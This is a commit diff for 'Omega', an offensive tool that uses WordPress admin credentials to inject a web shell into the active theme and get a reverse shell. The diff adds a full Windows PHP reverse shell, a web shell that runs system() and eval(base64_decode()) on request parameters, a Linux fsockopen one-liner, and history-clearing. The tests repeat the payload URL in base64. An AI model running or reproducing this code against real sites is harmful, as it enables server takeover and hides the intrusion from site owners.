Feature: Windows hosts compatibility (#3)

* Add windows hosts compatibility

* Add tests for new functions

* Add tests badge

* Delete LICENSE

* Create LICENSE

* Update README.md

* Improve README

README.MD

@@ -1,16 +1,18 @@
-<img alt="GitHub" src="https://img.shields.io/badge/version-v2.0-blue"> <img alt="GitHub" src="https://img.shields.io/github/license/anthares101/omega">
+<img alt="Test suite status" src="https://github.com/anthares101/omega/workflows/CI/badge.svg"> <img alt="Version v2.0" src="https://img.shields.io/badge/version-v2.0-blue"> <img alt="GPL-2.0 license" src="https://img.shields.io/github/license/anthares101/omega">
 
 # Omega - From Wordpress admin to pty
 
-The Linux tool to automate the process of getting a pty once you got admin credentials in a Wordpress site. Keep in mind that right now Omega only can attack Linux hosts.
+The Linux tool to automate the process of getting a pty once you got admin credentials in a Wordpress site. Works in Linux, Windows and MacOS hosts! 
+
+The shell code used for Windows hosts is a modified version of [this](https://github.com/ivan-sincek/php-reverse-shell) repository, credits to the author.
 
 ![Omega getting a pty to a Wordpress host](assets/demo.gif)
 
 ## How does it work?
 
-First, Omega gets an admin session in the Wordpress site and using web scrapping, it extracts the current template used by wordpress. After that, it will use the template editor to inject a simple web shell.
+First, Omega gets an admin session in the Wordpress site and using web scrapping, it extracts the current template used by wordpress. After that, it will use the template editor to inject a payload with a simple web shell and a base64 PHP code evaluation function.
 
-Once everything is set up, Omega will spin up a listenner, execute a reverse shell using the web shell injected and wait for the shell to connect back. Before giving the control to the user, Omega will try to stabilize the shell and get a pty.
+Once everything is set up, Omega will spin up a listenner, execute a reverse shell using the payload injected and wait for the shell to connect back. Before giving the control to the user, Omega will try to stabilize the shell and get a pty.
 
 If stabilization is not possible using the methods Omega has, a non tty shell will be provided that can be stabilize without problems using any method you want.
 

config.py

@@ -1,7 +1,10 @@
+from pwnlib import useragents
+
+
 VERSION = '2.0'
 
 DEFAULT_HEADERS = {
-    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'
+    'User-Agent': useragents.random()
 }
 
 SHELL_STABILIZATION_METHODS = {
@@ -18,3 +21,126 @@
         'sh': 'script -qc /bin/sh /dev/null'
     }
 }
+
+# Code from https://github.com/ivan-sincek/php-reverse-shell, modified a bit to take only the windows part
+SHELL_CODE = """
+class Shell {
+    private $addr  = null;
+    private $port  = null;
+    private $descriptorspec = array(
+        0 => array('pipe', 'r'), 
+        1 => array('pipe', 'w'), 
+        2 => array('pipe', 'w')  
+    );
+    private $buffer  = 1024;    
+    private $clen    = 0;       
+    private $error   = false;   
+    public function __construct($addr, $port) {
+        $this->addr = $addr;
+        $this->port = $port;
+    }
+    private function daemonize() {
+        $exit = false;
+        if (!function_exists('pcntl_fork')) {  } 
+        else if (($pid = @pcntl_fork()) < 0) {  } 
+        else if ($pid > 0) {
+            $exit = true;
+        } 
+        else if (posix_setsid() < 0) {  }
+        return $exit;
+    }
+    private function settings() {
+        @error_reporting(0);
+        @set_time_limit(0); 
+        @umask(0); 
+    }
+    private function dump($data) {
+        $data = str_replace('<', '&lt;', $data);
+        $data = str_replace('>', '&gt;', $data);
+        echo $data;
+    }
+    private function read($stream, $name, $buffer) {
+        if (($data = @fread($stream, $buffer)) === false) { 
+            $this->error = true;
+        }
+        return $data;
+    }
+    private function write($stream, $name, $data) {
+        if (($bytes = @fwrite($stream, $data)) === false) { 
+            $this->error = true;
+        }
+        return $bytes;
+    }
+    
+    private function rw($input, $output, $iname, $oname) {
+        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
+            if ($oname === 'STDIN') { $this->clen += strlen($data); }
+            $this->dump($data); 
+        }
+    }
+    
+    private function brw($input, $output, $iname, $oname) {
+        $fstat = fstat($input);
+        $size = $fstat['size'];
+        if ($iname === 'STDOUT' && $this->clen) {
+            while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
+                $this->clen -= $bytes;
+                $size -= $bytes;
+            }
+        }
+        while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
+            $size -= $bytes;
+            $this->dump($data); 
+        }
+    }
+    public function run() {
+        if (!$this->daemonize()) {
+            $this->settings();
+
+            $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
+            if ($socket) {
+                stream_set_blocking($socket, false); 
+
+                
+                $process = @proc_open('cmd.exe', $this->descriptorspec, $pipes, null, null);
+                if ($process) {
+                    foreach ($pipes as $pipe) {
+                        stream_set_blocking($pipe, false); 
+                    }
+                    
+                    $status = proc_get_status($process);
+                    do {
+                        $status = proc_get_status($process);
+                        $streams = array(
+                            'read'   => array($socket, $pipes[1], $pipes[2]), 
+                            'write'  => null,
+                            'except' => null
+                        );
+                        $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); 
+                        if ($num_changed_streams === false) {
+                            echo "STRM_ERROR: stream_select() failed\n"; break;
+                        } else if ($num_changed_streams > 0) {
+                            if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } 
+                            if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } 
+                            if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); }
+                        }
+                    } while (!$this->error);
+
+                    foreach ($pipes as $pipe) {
+                        fclose($pipe);
+                    }
+                    proc_close($process);
+                }
+                
+
+                fclose($socket);
+            }  
+        }
+    }
+}
+echo '<pre>';
+$sh = new Shell('LHOST', LPORT);
+$sh->run();
+unset($sh);
+echo '</pre>';
+"""

omega.py

@@ -57,7 +57,7 @@ def main(args: Namespace):
         shell.recvline_contains(b'$', timeout=0.5) # Check shell came back
         p.success('Got a shell!')
 
-    if(not no_pty):
+    if(not no_pty and shell_service.is_linux()):
         with log.progress('Trying to stabilize the shell...') as p:
             try:
                 shell_service.upgrade_shell(shell)

services/PayloadService.py

@@ -7,7 +7,7 @@ class PayloadService:
     def __init__(self, wp_url: str, wp_admin_session: Session):
         self.wp_url = wp_url
         self.wp_admin_session = wp_admin_session
-        self.payload = "<?php if(isset($_GET['omega'])){system($_GET['omega']);}?>\n"
+        self.payload = "<?php if(isset($_GET['omega'])){ if(isset($_GET['php'])){ eval(base64_decode($_GET['omega'])); }else{ system($_GET['omega']); } }?>\n"
 
     def drop_payload(self) -> str:
         active_theme_name = self.get_theme_name()

services/ShellService.py

@@ -1,5 +1,6 @@
 import requests
-from config import SHELL_STABILIZATION_METHODS
+import base64
+from config import SHELL_STABILIZATION_METHODS, SHELL_CODE, DEFAULT_HEADERS
 from pwnlib.tubes.listen import listen
 
 
@@ -15,14 +16,26 @@ def prepare_listener(self) -> listen:
         return listener
 
     def execute_rev_shell(self):
-        php_code = f'$sock=fsockopen("{self.lhost}",{self.lport});exec("/bin/sh -i <&3 >&3 2>&3");'
-        payload = requests.utils.quote(f"php -r '{php_code}'")
-
         try:
-            requests.get(f'{self.web_shell_url}?omega={payload}', timeout=2)
+            requests.get(self.get_shell_code_url_with_payload(), headers=DEFAULT_HEADERS, timeout=2)
         except requests.exceptions.ReadTimeout:
             pass
-
+
+    def get_shell_code_url_with_payload(self) -> str:
+        if(self.is_linux()):
+            shell_code = f'$sock=fsockopen("{self.lhost}",{self.lport});exec("/bin/sh -i <&3 >&3 2>&3");'
+            payload = requests.utils.quote(f"php -r '{shell_code}'")
+            return f'{self.web_shell_url}?omega={payload}'
+        else:
+            plain_shell_code = SHELL_CODE.replace('LHOST', f'{self.lhost}').replace('LPORT', f'{self.lport}')
+            payload = requests.utils.quote(base64.b64encode(plain_shell_code.encode()).decode())
+            return f'{self.web_shell_url}?omega={payload}&php'
+
+    def is_linux(self) -> bool:
+        os_check_code = requests.utils.quote(base64.b64encode(b"print('OMEGA_HOST_OS = '.PHP_OS);").decode())
+        response = requests.get(f'{self.web_shell_url}?omega={os_check_code}&php', headers=DEFAULT_HEADERS)
+        return 'OMEGA_HOST_OS = LINUX' in response.content.decode().upper()
+
     def upgrade_shell(self, shell: listen):
         shell.sendline(b'export HISTFILE=/dev/null') # Avoid history
         # Get pty

tests/mocks.py

@@ -134,3 +134,7 @@
                 </div>
         </script>
 </form>"""
+
+
+wordpress_os_detection_linux_response = """<html>OMEGA_HOST_OS = Linux</html>"""
+wordpress_os_detection_windows_response = """<html>OMEGA_HOST_OS = WINT</html>"""

tests/test_shell_service.py

@@ -2,6 +2,7 @@
 from services import ShellService
 from pwnlib.tubes.remote import remote
 from config import SHELL_STABILIZATION_METHODS
+from tests import mocks
 
 
 class ShellServiceTest(unittest.TestCase):
@@ -27,6 +28,52 @@ def test_execute_rev_shell(self):
         shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
         shell_service.execute_rev_shell()
 
+    @responses.activate
+    def test_get_shell_code_url_with_payload_linux(self):
+        responses.add(**{
+            'method'         : responses.GET,
+            'url'            : f'{self.web_shell_url}',
+            'status'         : 200,
+            'body'           : mocks.wordpress_os_detection_linux_response
+        })
+        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
+        self.assertEqual(shell_service.get_shell_code_url_with_payload(), 'http://fancy-wordpress-site.com/funny_file.php?omega=php%20-r%20%27%24sock%3Dfsockopen%28%22127.0.0.1%22%2C8080%29%3Bexec%28%22/bin/sh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27')
+
+    @responses.activate
+    def test_get_shell_code_url_with_payload_windows(self):
+        responses.add(**{
+            'method'         : responses.GET,
+            'url'            : f'{self.web_shell_url}',
+            'status'         : 200,
+            'body'           : mocks.wordpress_os_detection_windows_response
+        })
+        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
+        self.assertEqual(shell_service.get_shell_code_url_with_payload(), 'http://fancy-wordpress-site.com/funny_file.php?omega=CmNsYXNzIFNoZWxsIHsKICAgIHByaXZhdGUgJGFkZHIgID0gbnVsbDsKICAgIHByaXZhdGUgJHBvcnQgID0gbnVsbDsKICAgIHByaXZhdGUgJGRlc2NyaXB0b3JzcGVjID0gYXJyYXkoCiAgICAgICAgMCA9PiBhcnJheSgncGlwZScsICdyJyksIAogICAgICAgIDEgPT4gYXJyYXkoJ3BpcGUnLCAndycpLCAKICAgICAgICAyID0%2BIGFycmF5KCdwaXBlJywgJ3cnKSAgCiAgICApOwogICAgcHJpdmF0ZSAkYnVmZmVyICA9IDEwMjQ7ICAgIAogICAgcHJpdmF0ZSAkY2xlbiAgICA9IDA7ICAgICAgIAogICAgcHJpdmF0ZSAkZXJyb3IgICA9IGZhbHNlOyAgIAogICAgcHVibGljIGZ1bmN0aW9uIF9fY29uc3RydWN0KCRhZGRyLCAkcG9ydCkgewogICAgICAgICR0aGlzLT5hZGRyID0gJGFkZHI7CiAgICAgICAgJHRoaXMtPnBvcnQgPSAkcG9ydDsKICAgIH0KICAgIHByaXZhdGUgZnVuY3Rpb24gZGFlbW9uaXplKCkgewogICAgICAgICRleGl0ID0gZmFsc2U7CiAgICAgICAgaWYgKCFmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSkgeyAgfSAKICAgICAgICBlbHNlIGlmICgoJHBpZCA9IEBwY250bF9mb3JrKCkpIDwgMCkgeyAgfSAKICAgICAgICBlbHNlIGlmICgkcGlkID4gMCkgewogICAgICAgICAgICAkZXhpdCA9IHRydWU7CiAgICAgICAgfSAKICAgICAgICBlbHNlIGlmIChwb3NpeF9zZXRzaWQoKSA8IDApIHsgIH0KICAgICAgICByZXR1cm4gJGV4aXQ7CiAgICB9CiAgICBwcml2YXRlIGZ1bmN0aW9uIHNldHRpbmdzKCkgewogICAgICAgIEBlcnJvcl9yZXBvcnRpbmcoMCk7CiAgICAgICAgQHNldF90aW1lX2xpbWl0KDApOyAKICAgICAgICBAdW1hc2soMCk7IAogICAgfQogICAgcHJpdmF0ZSBmdW5jdGlvbiBkdW1wKCRkYXRhKSB7CiAgICAgICAgJGRhdGEgPSBzdHJfcmVwbGFjZSgnPCcsICcmbHQ7JywgJGRhdGEpOwogICAgICAgICRkYXRhID0gc3RyX3JlcGxhY2UoJz4nLCAnJmd0OycsICRkYXRhKTsKICAgICAgICBlY2hvICRkYXRhOwogICAgfQogICAgcHJpdmF0ZSBmdW5jdGlvbiByZWFkKCRzdHJlYW0sICRuYW1lLCAkYnVmZmVyKSB7CiAgICAgICAgaWYgKCgkZGF0YSA9IEBmcmVhZCgkc3RyZWFtLCAkYnVmZmVyKSkgPT09IGZhbHNlKSB7IAogICAgICAgICAgICAkdGhpcy0%2BZXJyb3IgPSB0cnVlOwogICAgICAgIH0KICAgICAgICByZXR1cm4gJGRhdGE7CiAgICB9CiAgICBwcml2YXRlIGZ1bmN0aW9uIHdyaXRlKCRzdHJlYW0sICRuYW1lLCAkZGF0YSkgewogICAgICAgIGlmICgoJGJ5dGVzID0gQGZ3cml0ZSgkc3RyZWFtLCAkZGF0YSkpID09PSBmYWxzZSkgeyAKICAgICAgICAgICAgJHRoaXMtPmVycm9yID0gdHJ1ZTsKICAgICAgICB9CiAgICAgICAgcmV0dXJuICRieXRlczsKICAgIH0KICAgIAogICAgcHJpdmF0ZSBmdW5jdGlvbiBydygkaW5wdXQsICRvdXRwdXQsICRpbmFtZSwgJG9uYW1lKSB7CiAgICAgICAgd2hpbGUgKCgkZGF0YSA9ICR0aGlzLT5yZWFkKCRpbnB1dCwgJGluYW1lLCAkdGhpcy0%2BYnVmZmVyKSkgJiYgJHRoaXMtPndyaXRlKCRvdXRwdXQsICRvbmFtZSwgJGRhdGEpKSB7CiAgICAgICAgICAgIGlmICgkb25hbWUgPT09ICdTVERJTicpIHsgJHRoaXMtPmNsZW4gKz0gc3RybGVuKCRkYXRhKTsgfQogICAgICAgICAgICAkdGhpcy0%2BZHVtcCgkZGF0YSk7IAogICAgICAgIH0KICAgIH0KICAgIAogICAgcHJpdmF0ZSBmdW5jdGlvbiBicncoJGlucHV0LCAkb3V0cHV0LCAkaW5hbWUsICRvbmFtZSkgewogICAgICAgICRmc3RhdCA9IGZzdGF0KCRpbnB1dCk7CiAgICAgICAgJHNpemUgPSAkZnN0YXRbJ3NpemUnXTsKICAgICAgICBpZiAoJGluYW1lID09PSAnU1RET1VUJyAmJiAkdGhpcy0%2BY2xlbikgewogICAgICAgICAgICB3aGlsZSAoJHRoaXMtPmNsZW4gPiAwICYmICgkYnl0ZXMgPSAkdGhpcy0%2BY2xlbiA%2BPSAkdGhpcy0%2BYnVmZmVyID8gJHRoaXMtPmJ1ZmZlciA6ICR0aGlzLT5jbGVuKSAmJiAkdGhpcy0%2BcmVhZCgkaW5wdXQsICRpbmFtZSwgJGJ5dGVzKSkgewogICAgICAgICAgICAgICAgJHRoaXMtPmNsZW4gLT0gJGJ5dGVzOwogICAgICAgICAgICAgICAgJHNpemUgLT0gJGJ5dGVzOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIHdoaWxlICgkc2l6ZSA%2BIDAgJiYgKCRieXRlcyA9ICRzaXplID49ICR0aGlzLT5idWZmZXIgPyAkdGhpcy0%2BYnVmZmVyIDogJHNpemUpICYmICgkZGF0YSA9ICR0aGlzLT5yZWFkKCRpbnB1dCwgJGluYW1lLCAkYnl0ZXMpKSAmJiAkdGhpcy0%2Bd3JpdGUoJG91dHB1dCwgJG9uYW1lLCAkZGF0YSkpIHsKICAgICAgICAgICAgJHNpemUgLT0gJGJ5dGVzOwogICAgICAgICAgICAkdGhpcy0%2BZHVtcCgkZGF0YSk7IAogICAgICAgIH0KICAgIH0KICAgIHB1YmxpYyBmdW5jdGlvbiBydW4oKSB7CiAgICAgICAgaWYgKCEkdGhpcy0%2BZGFlbW9uaXplKCkpIHsKICAgICAgICAgICAgJHRoaXMtPnNldHRpbmdzKCk7CgogICAgICAgICAgICAkc29ja2V0ID0gQGZzb2Nrb3BlbigkdGhpcy0%2BYWRkciwgJHRoaXMtPnBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOwogICAgICAgICAgICBpZiAoJHNvY2tldCkgewogICAgICAgICAgICAgICAgc3RyZWFtX3NldF9ibG9ja2luZygkc29ja2V0LCBmYWxzZSk7IAoKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgJHByb2Nlc3MgPSBAcHJvY19vcGVuKCdjbWQuZXhlJywgJHRoaXMtPmRlc2NyaXB0b3JzcGVjLCAkcGlwZXMsIG51bGwsIG51bGwpOwogICAgICAgICAgICAgICAgaWYgKCRwcm9jZXNzKSB7CiAgICAgICAgICAgICAgICAgICAgZm9yZWFjaCAoJHBpcGVzIGFzICRwaXBlKSB7CiAgICAgICAgICAgICAgICAgICAgICAgIHN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGUsIGZhbHNlKTsgCiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICRzdGF0dXMgPSBwcm9jX2dldF9zdGF0dXMoJHByb2Nlc3MpOwogICAgICAgICAgICAgICAgICAgIGRvIHsKICAgICAgICAgICAgICAgICAgICAgICAgJHN0YXR1cyA9IHByb2NfZ2V0X3N0YXR1cygkcHJvY2Vzcyk7CiAgICAgICAgICAgICAgICAgICAgICAgICRzdHJlYW1zID0gYXJyYXkoCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAncmVhZCcgICA9PiBhcnJheSgkc29ja2V0LCAkcGlwZXNbMV0sICRwaXBlc1syXSksIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgJ3dyaXRlJyAgPT4gbnVsbCwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICdleGNlcHQnID0%2BIG51bGwKICAgICAgICAgICAgICAgICAgICAgICAgKTsKICAgICAgICAgICAgICAgICAgICAgICAgJG51bV9jaGFuZ2VkX3N0cmVhbXMgPSBAc3RyZWFtX3NlbGVjdCgkc3RyZWFtc1sncmVhZCddLCAkc3RyZWFtc1snd3JpdGUnXSwgJHN0cmVhbXNbJ2V4Y2VwdCddLCAwKTsgCiAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkbnVtX2NoYW5nZWRfc3RyZWFtcyA9PT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVjaG8gIlNUUk1fRVJST1I6IHN0cmVhbV9zZWxlY3QoKSBmYWlsZWQKIjsgYnJlYWs7CiAgICAgICAgICAgICAgICAgICAgICAgIH0gZWxzZSBpZiAoJG51bV9jaGFuZ2VkX3N0cmVhbXMgPiAwKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoaW5fYXJyYXkoJHNvY2tldCwgJHN0cmVhbXNbJ3JlYWQnXSkvKi0tLS0tLSovKSB7ICR0aGlzLT5ydyAoJHNvY2tldCAgLCAkcGlwZXNbMF0sICdTT0NLRVQnLCAnU1RESU4nICk7IH0gCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoKCRmc3RhdCA9IGZzdGF0KCRwaXBlc1syXSkpICYmICRmc3RhdFsnc2l6ZSddKSB7ICR0aGlzLT5icncoJHBpcGVzWzJdLCAkc29ja2V0ICAsICdTVERFUlInLCAnU09DS0VUJyk7IH0gCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoKCRmc3RhdCA9IGZzdGF0KCRwaXBlc1sxXSkpICYmICRmc3RhdFsnc2l6ZSddKSB7ICR0aGlzLT5icncoJHBpcGVzWzFdLCAkc29ja2V0ICAsICdTVERPVVQnLCAnU09DS0VUJyk7IH0KICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgIH0gd2hpbGUgKCEkdGhpcy0%2BZXJyb3IpOwoKICAgICAgICAgICAgICAgICAgICBmb3JlYWNoICgkcGlwZXMgYXMgJHBpcGUpIHsKICAgICAgICAgICAgICAgICAgICAgICAgZmNsb3NlKCRwaXBlKTsKICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgcHJvY19jbG9zZSgkcHJvY2Vzcyk7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAKCiAgICAgICAgICAgICAgICBmY2xvc2UoJHNvY2tldCk7CiAgICAgICAgICAgIH0gIAogICAgICAgIH0KICAgIH0KfQplY2hvICc8cHJlPic7CiRzaCA9IG5ldyBTaGVsbCgnMTI3LjAuMC4xJywgODA4MCk7CiRzaC0%2BcnVuKCk7CnVuc2V0KCRzaCk7CmVjaG8gJzwvcHJlPic7Cg%3D%3D&php')
+
+    @responses.activate
+    def test_is_linux(self):
+        responses.add(**{
+            'method'         : responses.GET,
+            'url'            : f'{self.web_shell_url}',
+            'status'         : 200,
+            'body'           : mocks.wordpress_os_detection_linux_response
+        })
+
+        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
+        self.assertTrue(shell_service.is_linux())
+
+    @responses.activate
+    def test_is_not_linux(self):
+        responses.add(**{
+            'method'         : responses.GET,
+            'url'            : f'{self.web_shell_url}',
+            'status'         : 200,
+            'body'           : mocks.wordpress_os_detection_windows_response
+        })
+
+        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
+        self.assertFalse(shell_service.is_linux())
+
     def test_upgrade_shell(self):
         shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
         listener = shell_service.prepare_listener()